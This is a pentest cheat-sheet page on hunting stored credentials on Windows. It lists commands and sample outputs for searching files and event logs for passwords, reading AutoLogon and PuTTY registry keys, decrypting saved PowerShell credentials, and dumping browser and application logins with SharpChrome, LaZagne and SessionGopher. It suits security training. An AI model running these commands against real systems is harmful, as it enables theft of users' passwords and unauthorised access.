Credential Theft

Credential hunting involves searching for sensitive information, such as usernames and passwords, within various files and system locations. Below are methods for locating credentials on Windows systems.

Searching Security Logs Using wevtutil

You can query security logs for specific user actions, such as logins or credential usage:

PS C:\dbs> wevtutil qe Security /rd:true /f:text | Select-String "/user"

Example Output:

Process Command Line:   net use T: \\dbs\users /user:dollar P@ssword

Searching for Credentials in Files

Using Command Prompt

Search for specific terms like "password" in various file types:
```
C:\dbs> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
```
- Flags:
  - /S: Search in the current directory and all subdirectories.
  - /I: Ignore case sensitivity.
  - /M: Output only filenames containing the search string.

Searching within a specific user directory:

C:\dbs> findstr /S /I /C:"password" "C:\Users\*"*.txt *.ini *.cfg *.config *.xml

Manually searching a user's Documents folder:

C:\dbs> cd C:\Users\dollarboysushil\Documents & findstr /SI /M "password" *.xml *.ini *.txt

Using PowerShell

To search through text files in the Documents folder:

PS C:\dbs> select-string -Path C:\Users\dollarboysushil\Documents\*.txt -Pattern password

To find files with "pass" in their names:

C:\dbs> dir /S /B *pass*.txt, *pass*.xml, *pass*.ini, *cred*, *vnc*, *.config*

Searching recursively for configuration files:

C:\dbs> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Further Credential Theft

Listing Stored Credentials

To list stored usernames and passwords:
```
C:\dbs> cmdkey /list
```
To run a command as another user and save credentials:
```
C:\dbs> runas /savecred /user:marvel\james "COMMAND HERE"
```

Retrieving Browser Credentials

Use SharpChrome to retrieve cookies and saved logins from Google Chrome:
```
PS C:\dbs> .\SharpChrome.exe logins /unprotect
```
Using Lazagne to retrieve credentials from various applications:
```
PS C:\dbs> .\lazagne.exe all
```

Extracting saved credentials from various applications using SessionGopher:

C:\dbs> Import-Module .\SessionGopher.ps1
C:\dbs> Invoke-SessionGopher -Target WIN01

Windows AutoLogon

Windows AutoLogon allows a user to configure their system to automatically log into a specific account without entering credentials each time. The relevant registry keys can be found under HKEY_LOCAL_MACHINE:

C:\dbs> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Example Output:

AutoAdminLogon    REG_SZ    1
DefaultUserName   REG_SZ    dollarboysushil
DefaultPassword   REG_SZ    pleasesubscribe

Clear-Text Password Storage in the Registry

PuTTY

Saved sessions for PuTTY can be found in the following registry location:

Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>

Viewing Saved Wireless Networks

To view saved wireless network profiles:
```
netsh wlan show profile
```

PowerShell Credentials

PowerShell credentials can be stored and retrieved securely for scripting purposes. They are encrypted using Data Protection API (DPAPI) and can be decrypted only by the same user on the same computer.

Example Commands:

C:\dbs> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
C:\dbs> $credential.GetNetworkCredential().username
dollar
C:\dbs> $credential.GetNetworkCredential().password
pleasesubscribe

PreviousHyper-V Administrators NextActive Directory Attacks

Last updated 1 year ago

hashtagSearching Security Logs Using wevtutil

hashtagExample Output:

hashtagSearching for Credentials in Files

hashtagUsing Command Prompt

hashtagUsing PowerShell

hashtagFurther Credential Theft

hashtagListing Stored Credentials

hashtagRetrieving Browser Credentials

hashtagWindows AutoLogon

hashtagExample Output:

hashtagClear-Text Password Storage in the Registry

hashtagPuTTY

hashtagViewing Saved Wireless Networks

hashtagPowerShell Credentials

hashtagExample Commands:

Searching Security Logs Using wevtutil

Example Output:

Searching for Credentials in Files

Using Command Prompt

Using PowerShell

Further Credential Theft

Listing Stored Credentials

Retrieving Browser Credentials

Windows AutoLogon

Example Output:

Clear-Text Password Storage in the Registry

PuTTY

Viewing Saved Wireless Networks

PowerShell Credentials

Example Commands: